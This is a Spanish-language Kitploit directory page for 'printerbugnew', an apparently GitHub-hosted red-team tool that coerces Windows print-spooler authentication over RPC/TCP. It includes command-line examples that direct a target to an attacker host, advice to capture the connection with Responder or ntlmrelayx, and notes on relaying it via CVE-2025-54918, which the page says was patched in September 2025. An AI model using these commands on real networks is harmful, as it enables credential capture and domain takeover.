Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
printerbugnew — La versión de printerbug.py solo DCERPC | Kitploit
Herramientas/GitHubGitHub/decoder-it/printerbugnew
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de PenetraciónComando y ControlAutenticaciónRed Teaming
GitHubdecoder-it/printerbugnew

printerbugnew

La versión de printerbug.py solo DCERPC

Ver Repositorio
233262hace 10 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Disparador de spooler de impresión con RPC puro sobre TCP

Para Windows 11 22H2+ / Windows Server 2025

Uso

root@kitploit:~
printerbugnew.py <target_host> [username] [password] [domain] [attacker_host] [tcp_port]

Ejemplos

Conexión anónima

root@kitploit:~
printerbugnew.py 192.168.1.100

Con credenciales

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN

Disparar backconnect a un host diferente (atacante)

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50

Usar un puerto RPC específico

root@kitploit:~
printerbugnew.py 192.168.1.100 admin Password123 DOMAIN 192.168.1.50 49152

Notas

  • El objetivo debe ser Windows 11 22H2+ o Server 2025 (RPC sobre TCP por defecto)
  • Para versiones anteriores, spoolss usa RPC sobre Named Pipes (SMB)
  • Asegúrate de que los puertos 135 y los puertos RPC dinámicos (49152-65535) estén abiertos
  • Inicia Responder o ntlmrelayx en attacker_host para capturar la autenticación
  • Kerberos falla en este caso debido a un SPN incorrecto del spooler, lo que obliga a usar NTLM como respaldo.
  • Encuentra el puerto RPC/TCP del spooler objetivo consultando el Endpoint Mapper (EPM) del objetivo en TCP/135 para el UUID de interfaz 12345678-1234-abcd-ef00-0123456789ab. Puedes usar rpcdump.py, PortQry o cualquier herramienta que prefieras, o simplemente implementar la consulta EPM directamente en este código ;)
  • Basado en https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py

    imagen

    imagen

    imagen

Actualización para CVE-2025-54918

Este exploit por reflexión solo funciona en W2025 con el printerbug "nuevo" (DCERPC en lugar de Named Pipes). Tendrás que modificar ntlmrelayx en un par de puntos para que funcione. Después de eso, puedes disparar remotamente el printer bug en un DC W2025 y reflejar la autenticación a través de LDAPS(!), incluso si Channel Bindings es OBLIGATORIO

ldaprelayclient.py:
imagen
rpcrelayserver.py
imagen

y relay ;)
imagen


La vulnerabilidad se corrigió en el Patch Tuesday de septiembre de 2025: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918

La corrección garantiza que el MIC se calcula siempre, incluso cuando el mensaje Type 3 está vacío.

Gracias al autor de este CVE por la valiosa pista :)

Descargar herramienta